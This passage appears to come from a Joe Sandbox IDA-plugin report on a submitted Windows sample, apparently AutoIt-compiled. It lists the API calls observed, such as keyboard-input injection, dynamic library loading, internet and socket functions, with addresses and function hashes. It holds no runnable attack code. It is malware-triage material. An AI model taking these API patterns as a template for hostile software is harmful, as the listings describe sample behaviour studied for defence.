                                                                  • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 003BA956
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$DestroyWindow
                                                                  • String ID: msctls_updown32
                                                                  • API String ID: 4014797782-2298589950
                                                                  • Opcode ID: 47e91c0fbf2d988e46e6a94026f686c2eac49a0c701df1dbbe92e15756b48b30
                                                                  • Instruction ID: f6c2c0d19dc21be03a47b86c79e05c5d52d39771390f6a9aaeca3a1d565d046c
                                                                  • Opcode Fuzzy Hash: 47e91c0fbf2d988e46e6a94026f686c2eac49a0c701df1dbbe92e15756b48b30
                                                                  • Instruction Fuzzy Hash: B121A1B5600609AFDB12DF18DC81DBB37ADEF5A3A8B054059FB049B261CB31EC11DB61
                                                                  APIs
                                                                  • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 003B9A30
                                                                  • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 003B9A40
                                                                  • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 003B9A65
                                                                  Similarity
                                                                  • API ID: MessageSend$MoveWindow
                                                                  • String ID: Listbox
                                                                  • API String ID: 3315199576-2633736733
                                                                  APIs
                                                                  • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 003BA46D
                                                                  • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 003BA482
                                                                  • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 003BA48F
                                                                  Similarity
                                                                  • API ID: MessageSend
                                                                  • String ID: msctls_trackbar32
                                                                  • API String ID: 3850602802-1010561917
                                                                  APIs
                                                                  • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00372350,?), ref: 003722A1
                                                                  • GetProcAddress.KERNEL32(00000000), ref: 003722A8
                                                                  Similarity
                                                                  • API ID: AddressLibraryLoadProc
                                                                  • String ID: RoInitialize$combase.dll
                                                                  • API String ID: 2574300362-340411864
                                                                  APIs
                                                                  • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00372276), ref: 00372376
                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0037237D
                                                                  Similarity
                                                                  • API ID: AddressLibraryLoadProc
                                                                  • String ID: RoUninitialize$combase.dll
                                                                  • API String ID: 2574300362-2819208100
                                                                  APIs
                                                                  Similarity
                                                                  • API ID: LocalTime__swprintf
                                                                  • String ID: %.3d$WIN_XPe
                                                                  • API String ID: 2070861257-2409531811
                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,003B21FB,?,003B23EF), ref: 003B2213
                                                                  • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 003B2225
                                                                  Similarity
                                                                  • API ID: AddressLibraryLoadProc
                                                                  • String ID: GetProcessId$kernel32.dll
                                                                  • API String ID: 2574300362-399901964
                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,00000000,003542EC,?,003542AA,?), ref: 00354304
                                                                  • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00354316
                                                                  Similarity
                                                                  • API ID: AddressLibraryLoadProc
                                                                  • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                  • API String ID: 2574300362-1355242751
                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,003541BB,00354341,?,0035422F,?,003541BB,?,?,?,?,003539FE,?,00000001), ref: 00354359
                                                                  • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0035436B
                                                                  Similarity
                                                                  • API ID: AddressLibraryLoadProc
                                                                  • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                  • API String ID: 2574300362-3689287502
                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(oleaut32.dll,?,0039051D,?,003905FE), ref: 00390547
                                                                  • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 00390559
                                                                  Similarity
                                                                  • API ID: AddressLibraryLoadProc
                                                                  • String ID: RegisterTypeLibForUser$oleaut32.dll
                                                                  • API String ID: 2574300362-1071820185
                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,0039052F,?,003906D7), ref: 00390572
                                                                  • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 00390584
                                                                  Similarity
                                                                  • API ID: AddressLibraryLoadProc
                                                                  • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                                                                  • API String ID: 2574300362-1587604923
                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,003AECBE,?,003AEBBB), ref: 003AECD6
                                                                  • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 003AECE8
                                                                  Similarity
                                                                  • API ID: AddressLibraryLoadProc
                                                                  • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                  • API String ID: 2574300362-1816364905
                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,00000000,003ABAD3,00000001,003AB6EE,?,003EDC00), ref: 003ABAEB
                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 003ABAFD
                                                                  Similarity
                                                                  • API ID: AddressLibraryLoadProc
                                                                  • String ID: GetModuleHandleExW$kernel32.dll
                                                                  • API String ID: 2574300362-199464113
                                                                  • Opcode ID: 9d70ee7acfe152c3ec7925d7f5212173a4c4025b6b50155747b3ddbfa7bab0c6
                                                                  • Instruction ID: 8e38ccb43e75f1b39350b683ef65601b06851e33febbe5cc434ac60c0293118d
                                                                  • Opcode Fuzzy Hash: 9d70ee7acfe152c3ec7925d7f5212173a4c4025b6b50155747b3ddbfa7bab0c6
                                                                  • Instruction Fuzzy Hash: 73D05E708447129EC7325F20F848B12B7D8EB01300F11443BA853A2190D7B4C880C664
                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(advapi32.dll,?,003B3BD1,?,003B3E06), ref: 003B3BE9
                                                                  • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 003B3BFB
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: AddressLibraryLoadProc
                                                                  • String ID: RegDeleteKeyExW$advapi32.dll
                                                                  • API String ID: 2574300362-4033151799
                                                                  • Opcode ID: 4f684d90413a7de21b7048d8de69693cb5bb1a7e43820c542553d294516ba6c9
                                                                  • Instruction ID: 8a4a5d5bca783fd5569dc0aaa2887a1671bc0f8878db140dd3f11f268e4f6f24
                                                                  • Opcode Fuzzy Hash: 4f684d90413a7de21b7048d8de69693cb5bb1a7e43820c542553d294516ba6c9
                                                                  • Instruction Fuzzy Hash: 9CD05EB04407229AC7215BA0A808682BFA8AB01318F21482BE556A2590E6B8C8808E10
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6e3c2afc8c0fd03b6041ea7f2a33fd18930840587b28c78c416cc0f3d7f8fe29
                                                                  • Instruction ID: b355feea3091c391ad0749a6b0c420f0be1a27ef59efa65ea326a3614873dc6a
                                                                  • Opcode Fuzzy Hash: 6e3c2afc8c0fd03b6041ea7f2a33fd18930840587b28c78c416cc0f3d7f8fe29
                                                                  • Instruction Fuzzy Hash: 85C15C75A00219EFCB16EF94C884BBEB7B9FF48700F1545DAE805AB251D730AE41CB90
                                                                  APIs
                                                                  • CoInitialize.OLE32(00000000), ref: 003AAAB4
                                                                  • CoUninitialize.OLE32 ref: 003AAABF
                                                                    • Part of subcall function 00390213: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0039027B
                                                                  • VariantInit.OLEAUT32(?), ref: 003AAACA
                                                                  • VariantClear.OLEAUT32(?), ref: 003AAD9D
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                  • String ID:
                                                                  • API String ID: 780911581-0
                                                                  • Opcode ID: aaf9c183c694e72e0fb9456621cbf4a8dc5884af87ebf6017f68bc2142b54957
                                                                  • Instruction ID: 4b7d62185b3a97934820997558383357b239d3f391e1d1e535220d5fe838e07a
                                                                  • Opcode Fuzzy Hash: aaf9c183c694e72e0fb9456621cbf4a8dc5884af87ebf6017f68bc2142b54957
                                                                  • Instruction Fuzzy Hash: 4DA12776204B019FDB12EF14C491B1AB7E9FF89711F158849F9969B3A2CB30ED44CB86
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Variant$AllocClearCopyInitString
                                                                  • String ID:
                                                                  • API String ID: 2808897238-0
                                                                  • Opcode ID: 1873f2379c5556082f8fc55d56822af44e97b4a7ad1dd37db99aad94bb913b41
                                                                  • Instruction ID: 4d7454c5b6ac7c5bdb544e266afe52a403f93faad254bd5eed7bfdaed7d3e696
                                                                  • Opcode Fuzzy Hash: 1873f2379c5556082f8fc55d56822af44e97b4a7ad1dd37db99aad94bb913b41
                                                                  • Instruction Fuzzy Hash: 0F5193386047069BDB26BF66D891B3EB3E9EF44314F28985FF546CB6E1DBB098408705
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                                                  • String ID:
                                                                  • API String ID: 3877424927-0
                                                                  • Opcode ID: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
                                                                  • Instruction ID: b1891e523c379d31c43ed010592e7048f5a7a626f5054dccf1979d7e9eb7850b
                                                                  • Opcode Fuzzy Hash: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
                                                                  • Instruction Fuzzy Hash: 2051C7B0A00345EBCB3A8F69888466E77A5AF44320F25C72DF82D966D0D7799F50AB41
                                                                  APIs
                                                                  • GetWindowRect.USER32(00FB9BF0,?), ref: 003BC544
                                                                  • ScreenToClient.USER32(?,00000002), ref: 003BC574
                                                                  • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 003BC5DA
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Window$ClientMoveRectScreen
                                                                  • String ID:
                                                                  • API String ID: 3880355969-0
                                                                  • Opcode ID: 893730882cb25cb46828eaf9f40f495aee06357f1340e50d150514c2657571c9
                                                                  • Instruction ID: 7f204c9ca92c3c35f23e5e14dbb109353daf4c4e9b804fa1b580161534f94191
                                                                  • Opcode Fuzzy Hash: 893730882cb25cb46828eaf9f40f495aee06357f1340e50d150514c2657571c9
                                                                  • Instruction Fuzzy Hash: 25518E71A10208EFCF32CF68D880AEE7BB5EB45324F15925AFA559B690D730ED41CB90
                                                                  APIs
                                                                  • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 0038C462
                                                                  • __itow.LIBCMT ref: 0038C49C
                                                                    • Part of subcall function 0038C6E8: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 0038C753
                                                                  • SendMessageW.USER32(?,0000110A,00000001,?), ref: 0038C505
                                                                  • __itow.LIBCMT ref: 0038C55A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$__itow
                                                                  • String ID:
                                                                  • API String ID: 3379773720-0
                                                                  • Opcode ID: 468e5d53f19493bc2ba580b5fc531003f39861b4f6dec887c1a833e1e7d19020
                                                                  • Instruction ID: e971f5199fa7f682827617b0f2b974c5fdcf07bbf44d363b0a01130fddc76f18
                                                                  • Opcode Fuzzy Hash: 468e5d53f19493bc2ba580b5fc531003f39861b4f6dec887c1a833e1e7d19020
                                                                  • Instruction Fuzzy Hash: C441DA716007086FDF23EF55C851FEE7BB9AF49710F001059F905AB191DB74AA49CBA1
                                                                  APIs
                                                                  • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00393966
                                                                  • SetKeyboardState.USER32(00000080,?,00000001), ref: 00393982
                                                                  • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 003939EF
                                                                  • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00393A4D
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: KeyboardState$InputMessagePostSend
                                                                  • String ID:
                                                                  • API String ID: 432972143-0
                                                                  • Opcode ID: b864383db2bbd4f58dab673d60cc7a9db59202a3df8aa08283e8db3527bef1b1
                                                                  • Instruction ID: 697ab3f30ecae575ac96dd57f4b903d4deb24fc62ef6672163786968009bf560
                                                                  • Opcode Fuzzy Hash: b864383db2bbd4f58dab673d60cc7a9db59202a3df8aa08283e8db3527bef1b1
                                                                  • Instruction Fuzzy Hash: 8A4139B0E44248AEEF338B64D845BFEBBB9AF55310F04015AF4C1962D1C7B48E85D765
                                                                  APIs
                                                                  • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0039E742
                                                                  • GetLastError.KERNEL32(?,00000000), ref: 0039E768
                                                                  • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0039E78D
                                                                  • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0039E7B9
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: CreateHardLink$DeleteErrorFileLast
                                                                  • String ID:
                                                                  • API String ID: 3321077145-0
                                                                  • Opcode ID: 34e00e320a8b7e4d8083994ef1465b09e447b5cd8e29086821645bef65bdaf01
                                                                  • Instruction ID: a37ec332505034dcd139e93273d8675e95e602bf139d0410e690cfa65a3636be
                                                                  • Opcode Fuzzy Hash: 34e00e320a8b7e4d8083994ef1465b09e447b5cd8e29086821645bef65bdaf01
                                                                  • Instruction Fuzzy Hash: 2F410239600610DFCF12EF55C445A4DBBE5BF99720B0A8499E946AF3B2CB34FD448B91
                                                                  APIs
                                                                  • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 003BB5D1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: InvalidateRect
                                                                  • String ID:
                                                                  • API String ID: 634782764-0
                                                                  • Opcode ID: 8a5e5e150fe92e4e15632cdca81df48a4a896bb932532dca1eb2f02e92973931
                                                                  • Instruction ID: 63a476ddfa8f9f3c2fae3cdabd1657ba9a8203191bb5ba2c2d8d9e973da9aeb0
                                                                  • Opcode Fuzzy Hash: 8a5e5e150fe92e4e15632cdca81df48a4a896bb932532dca1eb2f02e92973931
                                                                  • Instruction Fuzzy Hash: 3E31BE74601208BFEB328F19CC85FE8B769AB06358F558112FB52D69E1CFB0ED409B56
                                                                  APIs
                                                                  • ClientToScreen.USER32(?,?), ref: 003BD807
                                                                  • GetWindowRect.USER32(?,?), ref: 003BD87D
                                                                  • PtInRect.USER32(?,?,003BED5A), ref: 003BD88D
                                                                  • MessageBeep.USER32(00000000), ref: 003BD8FE
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$BeepClientMessageScreenWindow
                                                                  • String ID:
                                                                  • API String ID: 1352109105-0
                                                                  • Opcode ID: f52560a9b658483124bb289cbca67484409a113f7164ed63b34d09d19e6b2cb5
                                                                  • Instruction ID: 5544ae569df20efe11e2c465ce622ada1816b78bf913c7415e04475fbefe62dd
                                                                  • Opcode Fuzzy Hash: f52560a9b658483124bb289cbca67484409a113f7164ed63b34d09d19e6b2cb5
                                                                  • Instruction Fuzzy Hash: 75418E74A00218DFCB12DF58E884BE97BF5FB4531AF1981A9E614DF664E731E941CB40
                                                                  APIs
                                                                  • GetKeyboardState.USER32(?,75A4C0D0,?,00008000), ref: 00393AB8
                                                                  • SetKeyboardState.USER32(00000080,?,00008000), ref: 00393AD4
                                                                  • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 00393B34
                                                                  • SendInput.USER32(00000001,?,0000001C,75A4C0D0,?,00008000), ref: 00393B92
                                                                  Similarity
                                                                  • API ID: KeyboardState$InputMessagePostSend
                                                                  • String ID:
                                                                  • API String ID: 432972143-0
                                                                  APIs
                                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00384038
                                                                  • __isleadbyte_l.LIBCMT ref: 00384066
                                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00384094
                                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 003840CA
                                                                  Similarity
                                                                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                  • String ID:
                                                                  • API String ID: 3058430110-0
                                                                  APIs
                                                                  • GetForegroundWindow.USER32 ref: 003B7CB9
                                                                    • Part of subcall function 00395F55: GetWindowThreadProcessId.USER32(?,00000000), ref: 00395F6F
                                                                    • Part of subcall function 00395F55: GetCurrentThreadId.KERNEL32 ref: 00395F76
                                                                    • Part of subcall function 00395F55: AttachThreadInput.USER32(00000000,?,0039781F), ref: 00395F7D
                                                                  • GetCaretPos.USER32(?), ref: 003B7CCA
                                                                  • ClientToScreen.USER32(00000000,?), ref: 003B7D03
                                                                  • GetForegroundWindow.USER32 ref: 003B7D09
                                                                  Similarity
                                                                  • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                  • String ID:
                                                                  • API String ID: 2759813231-0
                                                                  APIs
                                                                    • Part of subcall function 0036B34E: GetWindowLongW.USER32(?,000000EB), ref: 0036B35F
                                                                  • GetCursorPos.USER32(?), ref: 003BF211
                                                                  • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,003CE4C0,?,?,?,?,?), ref: 003BF226
                                                                  • GetCursorPos.USER32(?), ref: 003BF270
                                                                  • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,003CE4C0,?,?,?), ref: 003BF2A6
                                                                  Similarity
                                                                  • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                  • String ID:
                                                                  • API String ID: 2864067406-0
                                                                  APIs
                                                                  • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 003A4358
                                                                    • Part of subcall function 003A43E2: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 003A4401
                                                                    • Part of subcall function 003A43E2: InternetCloseHandle.WININET(00000000), ref: 003A449E
                                                                  Similarity
                                                                  • API ID: Internet$CloseConnectHandleOpen
                                                                  • String ID:
                                                                  • API String ID: 1463438336-0
                                                                  APIs
                                                                  • GetWindowLongW.USER32(?,000000EC), ref: 003B8AA6
                                                                  • SetWindowLongW.USER32(?,000000EC,00000000), ref: 003B8AC0
                                                                  • SetWindowLongW.USER32(?,000000EC,00000000), ref: 003B8ACE
                                                                  • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 003B8ADC
                                                                  Similarity
                                                                  • API ID: Window$Long$AttributesLayered
                                                                  • String ID:
                                                                  • API String ID: 2169480361-0
                                                                  APIs
                                                                  • select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 003A8AE0
                                                                  • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 003A8AF2
                                                                  • accept.WSOCK32(00000000,00000000,00000000), ref: 003A8AFF
                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 003A8B16
                                                                  Similarity
                                                                  • API ID: ErrorLastacceptselect
                                                                  • String ID:
                                                                  • API String ID: 385091864-0
                                                                  APIs
                                                                    • Part of subcall function 00391E68: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00390ABB,?,?,?,0039187A,00000000,000000EF,00000119,?,?), ref: 00391E77
                                                                    • Part of subcall function 00391E68: lstrcpyW.KERNEL32(00000000,?,?,00390ABB,?,?,?,0039187A,00000000,000000EF,00000119,?,?,00000000), ref: 00391E9D
                                                                    • Part of subcall function 00391E68: lstrcmpiW.KERNEL32(00000000,?,00390ABB,?,?,?,0039187A,00000000,000000EF,00000119,?,?), ref: 00391ECE
                                                                  • lstrlenW.KERNEL32(?,00000002,?,?,?,?,0039187A,00000000,000000EF,00000119,?,?,00000000), ref: 00390AD4
                                                                  • lstrcpyW.KERNEL32(00000000,?,?,0039187A,00000000,000000EF,00000119,?,?,00000000), ref: 00390AFA
                                                                  • lstrcmpiW.KERNEL32(00000002,cdecl,?,0039187A,00000000,000000EF,00000119,?,?,00000000), ref: 00390B2E
                                                                  Similarity
                                                                  • API ID: lstrcmpilstrcpylstrlen
                                                                  • String ID: cdecl
                                                                  • API String ID: 4031866154-3896280584
                                                                  APIs
